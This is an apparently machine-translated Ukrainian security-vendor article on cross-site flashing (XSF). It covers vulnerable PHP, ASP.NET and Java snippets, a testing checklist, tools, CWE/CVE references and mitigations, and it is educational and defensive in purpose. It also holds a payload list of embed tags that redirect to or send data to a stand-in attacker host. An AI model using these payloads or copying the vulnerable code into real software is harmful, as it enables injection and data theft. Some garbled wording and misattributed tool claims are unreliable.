20 Лют, 2023

Міжсайтового блимання

Vulnerability Assessment as a Service (VAaaS)

Tests systems and applications for vulnerabilities to address weaknesses.

Міжсайтового миготіння (XSF) це тип уразливості веб-додатки, яка може дозволити зловмиснику впровадити шкідливі файли Adobe Flash (SWF-файли) на законний веб-сайт, які потім можуть бути запущені нічого не підозрюють користувачами, які відвідують скомпрометований сайт. XSF може виникнути, коли веб-сайт не може належним чином перевірити дані, що вводяться користувачем або очистити дані, використовувані в параметрах об'єкта Flash, що дозволяє зловмисникові впровадити свій власний контент Flash на уразливий веб-сайт.

Приклад уразливого коду на різних мовах програмування:


В PHP:

				
					$param = $_GET['param'];
echo "<embed src='myflash.swf?param=".$param."' />";

				
			


У цьому коді скрипт приймає вхідний параметр 'param' з рядка запиту URL і безпосередньо вбудовує її в атрибут джерела Flash-об'єкта. Якщо зловмисникові вдасться впровадити шкідливий Flash-код в параметр 'param', він буде виконаний на стороні клієнта, що призведе до потенційної атаки XSF.

• в ASP.NET:

				
					string param = Request.QueryString["param"];
Response.Write("<embed src='myflash.swf?param=" + param + "' />");

				
			


Подібно до PHP-коду, цей ASP.NET скрипт приймає вхідний параметр 'param' з рядка запиту URL і безпосередньо вбудовує її в атрибут джерела Flash-об'єкта. Зловмисник може скористатися цією уразливістю, впровадивши шкідливий Flash-код в параметр 'param', що призведе до потенційної атаки XSF.

• у Java-сервлетах:

				
					String param = request.getParameter("param");
response.getWriter().println("<embed src='myflash.swf?param=" + param + "' />");

				
			


У цьому коді Java-сервлета скрипт приймає вхідний параметр 'param' з HTTP-запиту і безпосередньо вбудовує її в атрибут джерела Flash-об'єкта. Зловмисник може скористатися цією уразливістю, впровадивши шкідливий Flash-код в параметр 'param', що призведе до потенційної атаки XSF.

Приклади використання міжсайтового перепрошивки

Крадіжка конфіденційної інформації:

Зловмисник може впровадити шкідливий флеш-контент на законний веб-сайт, який потім краде конфіденційну інформацію у нічого не підозрюють користувачів, які відвідують скомпрометований сайт. Наприклад, зловмисник може створити підроблену форму входу в систему всередині шкідливого флеш-контенту, який пропонує користувачеві ввести свої облікові дані для входу. Потім ці облікові дані будуть відправлені на сервер зловмисника, надаючи йому доступ до облікового запису жертви.

Поширення шкідливих програм:

Зловмисник може вбудувати флеш-файл з шкідливим ПЗ, яке автоматично завантажується і встановлюється на комп'ютер жертви при відвідуванні скомпрометованого веб-сайту. Шкідлива програма може виконувати різні шкідливі дії, такі як реєстрація натискань клавіш, захоплення скріншотів, крадіжка особистої інформації або навіть перетворення комп'ютера жертви в ботнет.

Псування веб-сайту:

Зловмисник може вбудувати флеш-файл, який змінює зовнішній вигляд веб-сайту або відображає образливий контент. Це може завдати шкоди репутації веб-сайту і призвести до втрати бізнесу.

Перенаправлення на шкідливі сайти:

Зловмисник може вбудувати флеш-файл, який перенаправляє жертву на шкідливий веб-сайт, який може надалі використовувати систему користувача за допомогою інших типів атак, таких як фішинг або атаки на скачування з допомогою диска.

Методи підвищення привілеїв для міжсайтового перепрошивки

Використання уразливостей у веб-браузері жертви:

Після того, як зловмисник впровадив шкідливий Flash-контент в систему жертви, він може спробувати скористатися уразливими в веб-браузері жертви, щоб отримати подальший доступ. Це може включати використання відомих вразливостей або використання експлойтів нульового дня для обходу механізмів безпеки і отримання підвищених привілеїв.

Використання плагіна Flash для запуску довільного коду:

Оскільки плагін Adobe Flash має широкий доступ до системи жертви, зловмисник може використовувати файл Flash для виконання довільного коду на комп'ютері жертви. Це може включати завантаження і запуск додаткових шкідливих програм або виконання інших типів атак з метою підвищення їх привілеїв.

Використання інших типів вразливостей:

Зловмисник може використовувати XSF в поєднанні з іншими типами вразливостей для підвищення своїх привілеїв. Наприклад, зловмисник може використовувати XSF для впровадження шкідливого коду на веб-сайт, а потім використовувати окрему уразливість для отримання кореневого доступу до системи жертви.

Атаки соціальної інженерії:

Зловмисник може використовувати методи соціальної інженерії, щоб обманом змусити жертву запустити шкідливий флеш-файл з підвищеними привілеями. Це може зажадати переконання користувача вимкнути механізми безпеки або запустити флеш-файл з правами адміністратора.

Загальна методологія та контрольний список для міжсайтового перепрошивки

Методологія:

  1. Визначте області веб-сайту, які використовують Flash: Визначте всі області веб-сайту, де використовується Flash, включаючи області, які дозволяють користувачеві вводити дані або завантажувати файли.

  2. Використовуйте проксі-сервер для захоплення HTTP-трафіку: Використовуйте проксі-інструмент, такий як Burp Suite, для збору та аналізу HTTP-трафіку між веб-сервером і браузером. Це допоможе ідентифікувати запити і відповіді, що містять флеш-файли.

  3. Змініть параметри флеш-файлу: Змініть параметри флеш-файлу і поспостерігайте за поведінкою веб-сайту. Це допоможе визначити, чи флеш-файл вразливим для XSF-атак.

  4. Перевірка на наявність відомих вразливостей XSF: Перевірте наявність відомих вразливостей XSF у флеш-файл, таких як можливість передачі параметрів у флеш-файл, які допускають межсайтовые скриптові атаки.

  5. Тест на підвищення привілеїв: Перевірте на підвищення привілеїв, спробувавши використовувати будь-які відомі уразливості в плагіні Flash або інших частинах системи. Це може включати спробу завантажити та виконати довільний код, отримати доступ до конфіденційної інформації, або отримати контроль над системою жертви.

  6. Документуйте і повідомляйте про будь вразливості: Документуйте всі виявлені вразливості і повідомляйте про них власникові веб-сайту або відповідним органам влади. Увімкніть докладне пояснення уразливості, потенційного впливу та кроків з усунення.

  7. Повторне тестування після застосування виправлень: Повторно перевірте веб-сайт після застосування будь-яких виправлень, щоб переконатися, що уразливості були усунені належним чином і що веб-сайт більше не уразливим для атак XSF.

Контрольний список:

  1. Визначте всі області веб-сайту, де використовується Flash, включаючи області, які дозволяють користувачеві вводити дані або завантажувати файли.

  2. Перевірте, чи немає реклами на основі Flash, віджетів або іншого стороннього вмісту, який може бути вбудований в веб-сайт.

  3. Використовуйте проксі-інструмент, такий як Burp Suite, для збору та аналізу HTTP-трафіку між веб-сервером і браузером.

  4. Перевірте наявність яких-небудь керованих користувачем параметрів у флеш-файл.

  5. Змініть параметри флеш-файлу і поспостерігайте за поведінкою веб-сайту.

  6. Перевірте, чи є можливість передавати у флеш-файл параметри, допускають межсайтовые скриптові атаки.

  7. Перевірте наявність відомих вразливостей XSF у флеш-файлі або інших компонентах системи.

  8. Перевірте можливість завантаження та виконання довільного коду за допомогою Flash-файлу.

  9. Перевірка на підвищення привілеїв шляхом спроби отримати доступ до конфіденційної інформації чи контроль над системою жертви.

  10. Документуйте всі виявлені вразливості і повідомляйте про них власникові веб-сайту або відповідним органам влади.

  11. Повторно перевірте веб-сайт після застосування будь-яких виправлень, щоб переконатися, що уразливості були усунені належним чином і що веб-сайт більше не уразливим для атак XSF.

Набір інструментів для експлуатації Міжсайтового блимання

Ручні Інструменти:

  • Adobe Flash Debugger – автономний інструмент для аналізу та налагодження Flash-файлів, який можна використовувати для виявлення вразливостей XSF Flash-файлі.

  • SWFScan – інструмент для сканування SWF-файлів на наявність вразливостей, включаючи XSF-атаки. Він також може виявляти інші типи вразливостей, такі як міжсайтовий скриптінг і впровадження SQL.

  • SWF Decompiler – інструмент для декомпіляції та аналізу SWF-файлів, який може бути використаний для виявлення вразливостей XSF у флеш-файл. Він також може бути використаний для зміни флеш-файлу і перевірки на підвищення привілеїв.

  • Wireshark – інструмент мережевого аналізу, який можна використовувати для збору і аналізу мережевого трафіку між веб-сервером і браузером, що може допомогти ідентифікувати атаки XSF.

  • Firebug – інструмент веб-розробки, який можна використовувати для перевірки та зміни параметрів Flash-файлів, що може допомогти виявити і використовувати уразливості XSF.

Автоматизовані інструменти:

  • Acunetix – сканер веб-додатків, який можна використовувати для виявлення вразливостей XSF на веб-сайті. Він також може виявляти інші типи вразливостей, такі як міжсайтовий скриптінг і впровадження SQL.

  • AppSpider – сканер веб-додатків, який можна використовувати для виявлення вразливостей XSF на веб-сайті. Він також може виявляти інші типи вразливостей, такі як міжсайтовий скриптінг і впровадження SQL.

  • Burp Suite – інструмент тестування веб-додатків, що включає проксі-сервер, який можна використовувати для збору і аналізу HTTP-трафіку між веб-сервером і браузером. Він також може бути використаний для тестування вразливостей XSF і підвищення привілеїв.

  • ZAP – сканер веб-додатків з відкритим вихідним кодом, який можна використовувати для виявлення вразливостей XSF на веб-сайті. Він також може виявляти інші типи вразливостей, такі як міжсайтовий скриптінг і впровадження SQL.

  • Netsparker – сканер веб-додатків, який можна використовувати для виявлення вразливостей XSF на веб-сайті. Він також може виявляти інші типи вразливостей, такі як міжсайтовий скриптінг і впровадження SQL.

  • Nmap – інструмент відображення мережі, який можна використовувати для визначення відкритих портів і служб у цільовій системі, що може допомогти виявити уразливості XSF.

  • sqlmap – інструмент для виявлення і використання вразливостей SQL-ін'єкцій на веб-сайті, який може бути використаний для виявлення і використання вразливостей XSF.

  • Metasploit – інструмент тестування на проникнення, який включає в себе широкий спектр експлойтів і корисних навантажень, які можна використовувати для тестування вразливостей XSF і підвищення привілеїв.

  • Grendel-Scan – сканер веб-додатків з відкритим вихідним кодом, який можна використовувати для виявлення вразливостей XSF на веб-сайті. Він також може виявляти інші типи вразливостей, такі як міжсайтовий скриптінг і впровадження SQL.

  • Vega – сканер веб-додатків з відкритим вихідним кодом, який можна використовувати для виявлення вразливостей XSF на веб-сайті. Він також може виявляти інші типи вразливостей, такі як міжсайтовий скриптінг і впровадження SQL.

Плагіни для браузера:

  • Flashblock – плагін для браузера, який за замовчуванням блокує весь Flash-контент, що може допомогти захистити від XSF-атак.

  • NoScript – плагін для браузера, який за замовчуванням блокує весь JavaScript, що може допомогти захистити від XSF-атак, заснованих на JavaScript.

  • Ghostery – плагін для браузера, який блокує сторонні сценарії відстеження, включаючи відстеження на основі Flash, що може допомогти захистити від XSF-атак.

  • uBlock Origin – плагін для браузера, який блокує рекламу і інший небажаний контент, включаючи рекламу на основі Flash, що може допомогти захистити від XSF-атак.

  • ScriptSafe – плагін для браузера, який блокує скрипти і інший активний контент, включаючи контент на основі Flash, який може допомогти захистити від XSF-атак.

Середній бал CVSS міжсайтового миготіння стека

Загальна система оцінки вразливостей (CVSS) надає спосіб оцінки серйозності вразливостей в системі безпеки. Оцінка CVSS являє собою числове значення в діапазоні від 0 до 10, де 10 являє собою найбільш серйозні уразливості.

Оцінка вразливостей CVSS для міжсайтового перепрошивки (XSF) може змінюватись в залежності від конкретної уразливості і її впливу. В цілому, уразливості XSF можуть чинити сильний вплив на безпеку веб-додатків, оскільки вони можуть бути використані для крадіжки конфіденційної інформації, компрометації облікових записів користувачів або захоплення веб-додатки.

Оцінка CVSS вразливостей XSF зазвичай знаходиться в діапазоні від 5 до 9, при цьому деякі уразливості оцінюються вище або нижче цього показника. Проте варто відзначити, що оцінка CVSS - це лише один фактор, який слід враховувати при оцінці серйозності уразливості. Слід також брати до уваги інші фактори, такі як ймовірність використання уразливості, потенційний вплив на систему або програму і простота експлуатації.

Загальна перерахування слабких місць (CWE)

CWE-79: неправильна нейтралізація вводу під час генерації веб-сторінки ('Міжсайтовий скриптінг') – XSF може використовуватися в поєднанні з межсайтовым скриптингом (XSS) для впровадження шкідливого коду на веб-сторінки.

CWE-352: Підробка міжсайтових запитів (CSRF) - XSF може використовуватися для обману користувачів з метою виконання CSRF–атак, які можуть призвести до несанкціонованих дій на веб-сайті.

CWE-434: необмежена завантаження файлу з небезпечним типом – XSF може використовуватися для обходу перевірки типу файлу і завантаження шкідливих файлів, таких як Flash-файли на веб-сервер.

CWE-539: Використання постійних файлів cookie, які містять конфіденційну інформацію – XSF може використовуватися для крадіжки конфіденційної інформації, що зберігається в постійних файли cookie, такий як ідентифікатори сеансів.

CWE-565: залежність від файлів cookie без перевірки і перевірки цілісності – XSF може використовуватися для зміни або видалення файлів cookie, що може призвести до перехоплення сеансу або інших атак.

CWE-613: недостатній термін дії сеансу – XSF може використовуватися для продовження терміну дії сеансу користувача, дозволяючи зловмисникам зберігати доступ до облікового запису користувача.

CWE-807: залежність від ненадійних вхідних даних при прийнятті рішення про безпеки – XSF може використовуватися для маніпулювання рішеннями щодо безпеки, прийнятими веб-додатком, такими як контроль доступу або перевірки авторизації.

CWE-815: неможливість очищення спеціальних елементів в іншій площині (впровадження спеціальних елементів) – XSF може використовуватися для впровадження спеціальних символів, таких як теги HTML або об'єкти XML, веб-сторінки, що призводить до атак з використанням спеціальних елементів.

CWE-918: Підробка запитів на стороні сервера (SSRF) - XSF може використовуватися для виконання SSRF–атак, які можуть дозволити зловмисникам отримати доступ до внутрішніх ресурсів та систем.

CWE-933: Неправильний контроль імені файлу інструкції Include / Require у програмі PHP ("Включення файлу PHP") – XSF може використовуватися для обходу захисту від включення файлів в додатках PHP і виконання довільного коду.

CVE, пов'язані з межсайтовым перепрошиванням

CVE-2017-8406 – На пристроях D-Link DCS-1130 була виявлена проблема. Пристрій забезпечує crossdomain.xml файл без будь-яких обмежень на те, хто може отримати доступ до веб-сервера. Це дозволяє розміщеним флеш-файлу в будь-якому домені здійснювати виклики веб-сервера пристрої та отримувати будь-яку інформацію, яка зберігається на пристрої. У цьому випадку облікові дані користувача зберігаються на пристрої у вигляді відкритого тексту, і їх можна легко витягти. Також здається, що пристрій не реалізує який-небудь механізм захисту від підробки міжсайтових сценаріїв, який дозволяє зловмисникові обдурити користувача, який увійшов у веб-інтерфейс управління, для виконання межсайтовой флеш-атаки в браузері користувача та виконання будь-яких дій на пристрої, що надається веб-інтерфейсом управління який краде облікові дані відповіді файлу tools_admin.cgi і відображає його текстового поля.

CVE-2015-8760 – Компонент Flvplayer в TYPO3 6.2.x до версії 6.2.16 дозволяє віддаленим зловмисникам вбудовувати Flash-відео з зовнішніх доменів за допомогою невказаних векторів, інакше званих "межсайтовым перепрошиванням".

Міжсайтового блимання подвиги

BeEF (Платформа для роботи з браузером) – BeEF - це інструмент, який використовує XSF для використання вразливих веб-браузерів і виконання команд на комп'ютері жертви.

Ін'єкція SWF – Впровадження SWF - це метод, який використовує XSF для впровадження шкідливих Флеш-файлів на веб-сторінки, які можуть бути використані для крадіжки конфіденційної інформації або захоплення комп'ютера користувача.

XSS + Спалах – XSS + Flash - це атака, яка поєднує XSF з межсайтовым скриптингом (XSS) для виконання шкідливого Flash-коду в браузері жертви.

Кликджекинг зі спалахом – Clickjacking з допомогою Flash - це атака, яка використовує XSF для розміщення прозорого флеш-об'єкта поверх веб-сторінки, обманом змусити користувачів натискати на приховані кнопки або посилання.

CSRF зі Спалахом – CSRF з Flash - це атака, яка використовує XSF для виконання міжсайтових атак з підробкою запитів (CSRF), що дозволяє зловмиснику виконувати несанкціоновані дії від імені жертви.

Перенаправлення на основі Flash – Перенаправлення на основі Flash - це атака, яка використовує XSF для перенаправлення веб-браузера жертви на шкідливий веб-сайт або набір експлойтів.

Впорскування параметрів спалаху – Впровадження параметрів Flash - це атака, використовує XSF для маніпулювання параметрами Flash-файлу, які можуть бути використані для використання вразливостей Flash Player і виконання довільного коду.

Ін'єкція печива – Впровадження файли cookie - це атака, яка використовує XSF для впровадження шкідливого Flash-файлу в браузер користувача, який може бути використаний для крадіжки конфіденційної інформації з файлів cookie, такий як ідентифікатори сеансів.

Уразливості при завантаженні SWF-файлів – Вразливості для завантаження SWF-файлів - це уразливості XSF, які дозволяють зловмисникам завантажувати шкідливі Flash-файли на веб-сервер і виконувати довільний код.

Міждоменні сценарії на основі Flash – Міждоменної скриптінг на основі Flash - це атака, використовує XSF для виконання скриптів в різних доменах, які можуть бути використані для крадіжки конфіденційної інформації або виконання несанкціонованих дій на інших веб-сайтах.

Практикуючись в тестуванні на Міжсайтового блимання

Використання вразливих веб-додатків – Шукайте веб-додатки, які, як відомо, уразливі для XSF, і використовуйте їх для практичного виявлення та використання вразливостей XSF. Вразливі програми можна знайти на таких сайтах, як OWASP або VulnHub.

Налаштуйте свою власну тестову середу – Ви можете налаштувати тестову середу з веб-сервером і вразливими веб-додатками для практичного тестування на XSF. Ви можете використовувати такі інструменти, як DVWA (біса вразливе веб-додаток) або Mutillidae, для створення вразливою середовища.

Використовуйте інструменти – Існує декілька доступних автоматизованих інструментів, які можуть допомогти вам виявити уразливості XSF у веб-додатках. Такі інструменти, як Burp Suite, OWASP ZAP і Acunetix, можуть допомогти вам швидко і легко виявляти уразливості XSF.

Практикуйте ручне тестування – Ручне тестування включає в себе перевірку вихідного коду веб-додатків і ручне виявлення вразливостей XSF. Ви можете використовувати такі інструменти, як Fiddler або Wireshark, для перехоплення HTTP-запитів і відповідей та перевірки коду на наявність вразливостей XSF.

Беріть участь у заходах CTF – Події захоплення прапора (CTF) часто включають проблеми, пов'язані з XSF та іншими уразливими веб-додатків. Участь в цих заходах може допомогти вам попрактикуватися у виявленні і використанні вразливостей XSF в конкурентному середовищі.

Відвідувати навчальні курси – Існує декілька доступних навчальних курсів, які можуть навчити вас тестувати XSF та інші уразливості веб-додатків. Ви можете відвідати курси, пропоновані такими організаціями, як SANS або Offensive Security, щоб дізнатися більше про тестування XSF.

Для вивчення міжсайтового блимання

OWASP

Проект Open Web Application Security Project (OWASP) - це некомерційна організація, яка надає ресурси та інструменти, що допомагають організаціям підвищити безпеку своїх веб-додатків. На їх веб-сайті є спеціальна сторінка, присвячена XSF, на якій представлено огляд уразливості і деякі методи її тестування.

SANS 

SANS - це організація з навчання та сертифікації, яка пропонує кілька курсів, пов'язаних з безпекою веб-додатків, включаючи курси з XSF. Ці курси призначені як для початківців, так і для досвідчених професіоналів і охоплюють такі теми, як методи тестування XSF, експлуатація і пом'якшення наслідків.

Керівництво хакера веб-додатків 

The Web Application hacker's Handbook - популярна книга, яка охоплює широкий спектр вразливостей веб-додатків, включаючи XSF. У книзі міститься докладний огляд XSF, включаючи те, як працює вразливість, загальні методи експлуатації і стратегії пом'якшення наслідків.

Burp Suite 

Burp Suite - це популярний інструмент тестування безпеки веб-додатків, що включає функції для виявлення вразливостей XSF. Burp Suite включає в себе як автоматичного, так і ручного тестування для XSF, а також інструменти для використання та усунення вразливості.

YouTube

YouTube включає в себе безліч відеороликів, пов'язаних з XSF, включаючи навчальні посібники, покрокові керівництва і демонстрації. Деякі популярні канали, присвячені XSF та іншим темам безпеки веб-додатків, що включають Hackersploit, IppSec і LiveOverflow.

Книги з оглядом Міжсайтового перепрошивки

Керівництво хакера веб-додатків автор: Дафидд Штуттард і Маркус Пінто – У цій книзі розглядається широкий спектр вразливостей веб-додатків, включаючи XSF. Автори докладно розглядають XSF, включаючи те, як працює вразливість, загальні методи використання і стратегії пом'якшення наслідків.

Безпека веб-додатків: Керівництво для початківців Брайан Салліван і Вінсент Лью – Ця книга являє собою введення в безпеку веб-додатків, включаючи розділ про XSF. Автори розповідають про засади XSF, в тому числі про те, як працює вразливість і як її ідентифікувати та використовувати.

Злом відкритих веб-додатків автор: Джоел Скамбрей, Вінсент Ллю і Калеб Сіма – У цій книзі розглядається широкий спектр вразливостей веб-додатків, включаючи XSF. Автори надають огляд XSF, включаючи те, як працює вразливість, загальні методи використання і стратегії пом'якшення наслідків.

Заплутана мережа: керівництво по забезпеченню безпеки сучасних веб-додатків Михайло Залевський – Ця книга охоплює широкий спектр вразливостей веб-додатків, включаючи XSF. Автор докладно розглядає XSF, включаючи те, як працює вразливість, загальні методи використання і стратегії пом'якшення наслідків.

Освоєння сучасного веб-тестування на Проникнення автор: Пракхар Прасад – Ця книга містить докладний огляд безпеки веб-додатків, включаючи розділ про XSF. Автор описує основи XSF, в тому числі те, як працює вразливість і як її ідентифікувати та використовувати.

Black Hat Python: Програмування на Python для хакерів і пентестеров автор: Джастін Сейтц – Ця книга охоплює широкий спектр тем злому, включаючи безпеку веб-додатків і XSF. Автор наводить приклади експлойтів XSF з використанням Python.

Кулінарна книга з тестування веб-проникнення на Python Кемерон Б'юкенен, Террі Іп, Ендрю Маббитт і Бенджамін Мей – Ця книга являє собою введення в тестування безпеки веб-додатків з використанням Python, включаючи розділ про XSF. Автори розповідають про засади XSF, в тому числі про те, як працює вразливість і як її ідентифікувати та використовувати.

Основи злому і тестування на проникнення автор: Патрік Энгебретсон – Ця книга являє собою введення в злом і тестування на проникнення, включаючи розділ про безпеку веб-додатків і XSF. Автор описує основи XSF, в тому числі те, як працює вразливість і як її ідентифікувати та використовувати.

Пошук помилок в реальному світі: практичне керівництво по веб-хакінгу Пітер Яворські – Ця книга являє собою введення в тестування безпеки веб-додатків, включаючи розділ про XSF. Автор описує основи XSF, в тому числі те, як працює вразливість і як її ідентифікувати та використовувати.

Тестування безпеки веб-додатків за допомогою Burp Suite автор: Sunny Wear – Ця книга являє собою введення в тестування безпеки веб-додатків з використанням популярного інструменту Burp Suite. Автор описує основи XSF, в тому числі те, як працює вразливість і як її ідентифікувати і використати за допомогою Burp Suite.

Список корисних навантажень для міжсайтового блимання

Просте вікно попередження, яке може бути викликане введенням флеш-контентом.

				
					String param = request.getParameter("param");
response.getWriter().println("<embed src='myflash.swf?param=" + param + "' />");
				
			


Iframe, який завантажує шкідливу сторінку всередині вразливою сторінки.

				
					<embed src="https://example.com/malicious.swf" type="application/x-shockwave-flash" AllowScriptAccess="always" allowNetworking="all" width="1" height="1" FlashVars="param1=<iframe src='https://malicious-site.com/'></iframe>"/>
				
			

 

Тег зображення, який замінюється шкідливим скриптом.

				
					<embed src="https://example.com/malicious.swf" type="application/x-shockwave-flash" AllowScriptAccess="always" allowNetworking="all" width="1" height="1" FlashVars="param1=<img class="lazyload" src=x onerror=alert('XSF exploit!') />"/>
				
			

 

Перенаправлення на шкідливу сторінку.

				
					<embed src="https://example.com/malicious.swf" type="application/x-shockwave-flash" AllowScriptAccess="always" allowNetworking="all" width="1" height="1" FlashVars="param1=<script>window.location='http://malicious-site.com/'</script>"/>
				
			

 

Запит XHR (XMLHttpRequest), який краде конфіденційну інформацію користувача.

				
					<embed src="https://example.com/malicious.swf" type="application/x-shockwave-flash" AllowScriptAccess="always" allowNetworking="all" width="1" height="1" FlashVars="param1=<script>var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://malicious-site.com/stolen-data', true); xhr.send();</script>"/>
				
			

Як бути захищеним від міжсайтового блимання

  1. Оновлюйте свій веб-браузер і Flash player з допомогою останніх виправлень безпеки.

  2. Використовуйте браузер з вбудованим захистом від XSF-атак, наприклад Google Chrome або Mozilla Firefox.

  3. Встановіть розширення для браузера, яке блокує флеш-контент, наприклад Flashblock.

  4. Вимкніть плагін Flash в вашому веб-браузері, якщо тільки це не є абсолютно необхідним для конкретного веб-сайту або програми.

  5. Використовуйте політику безпеки вмісту (CSP), щоб обмежити типи вмісту, яке може бути завантажене вашими веб-сторінками.

  6. Вбудуйте правильну перевірку вхідних даних і кодування вихідних даних в свої веб-додатки, щоб запобігти впровадження шкідливого вмісту Flash.

  7. Регулярно перевіряйте свої веб-додатки на наявність вразливостей з допомогою автоматичних інструментів та / або ручного тестування.

  8. Навчіть своїх співробітників і користувачів розпізнавати та уникати атак соціальної інженерії, які можуть бути використані для використання вразливостей XSF.

Заходи по пом'якшенню наслідків міжсайтового блимання

  1. Вбудуйте правильну перевірку вхідних даних і кодування вихідних даних в свої веб-додатки, щоб запобігти впровадження шкідливого вмісту Flash.

  2. Використовуйте політику безпеки вмісту (CSP), щоб обмежити типи вмісту, яке може бути завантажене вашими веб-сторінками, включаючи вміст Flash.

  3. Вимкніть плагін Flash в вашому веб-браузері, якщо тільки це не є абсолютно необхідним для конкретного веб-сайту або програми.

  4. Використовуйте браузер з вбудованим захистом від XSF-атак, наприклад Google Chrome або Mozilla Firefox.

  5. Встановіть розширення для браузера, яке блокує флеш-контент, наприклад Flashblock.

  6. Оновлюйте свій веб-браузер і Flash player з допомогою останніх виправлень безпеки.

  7. Регулярно перевіряйте свої веб-додатки на наявність вразливостей з допомогою автоматичних інструментів та / або ручного тестування.

  8. Навчіть своїх співробітників і користувачів розпізнавати та уникати атак соціальної інженерії, які можуть бути використані для використання вразливостей XSF.

  9. Використовуйте брандмауер веб-додатків (WAF), який може виявляти і блокувати атаки XSF.

  10. Вбудуйте безпечний життєвий цикл розробки програмного забезпечення (SDLC), щоб звести до мінімуму ризик вразливостей XSF в своїх веб-додатках.

Висновок

Міжсайтового миготіння (XSF) це уразливість в системі безпеки веб-програми, яка може бути використана зловмисниками для впровадження та виконання шкідливого флеш-контенту в веб-браузері жертви. Атаки XSF можуть призвести до цілого ряду наслідків, від крадіжки конфіденційних даних до захоплення контролю над комп'ютером жертви.

Для захисту від XSF-атак веб-розроблювачі і власники сайтів повинні впроваджувати в свої веб-додатки перевірку вхідних даних, кодування вихідних даних і політики безпеки контенту. Користувачі також можуть вжити заходів для власного захисту, такі як підтримка своїх веб-браузерів і Flash-плеєрів в актуальному стані, відключення плагіна Flash, коли він не потрібен, та використання браузера з вбудованим захистом від XSF-атак.

В цілому, ключем до запобігання атак XSF є впровадження комплексного підходу до безпеки веб-додатків, який включає в себе методи безпечного кодування, регулярні оцінки вразливостей і навчання користувачів. Застосовуючи попереджувальний підхід до забезпечення безпеки, організації можуть знизити ризик XSF-атак і захистити від інших типів веб-загроз.

Інші Послуги

Готові до безпеки?

зв'язатися з нами